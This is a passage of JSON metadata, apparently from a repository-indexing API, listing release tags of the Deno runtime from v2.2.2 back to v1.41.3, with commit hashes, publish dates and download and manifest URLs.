","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v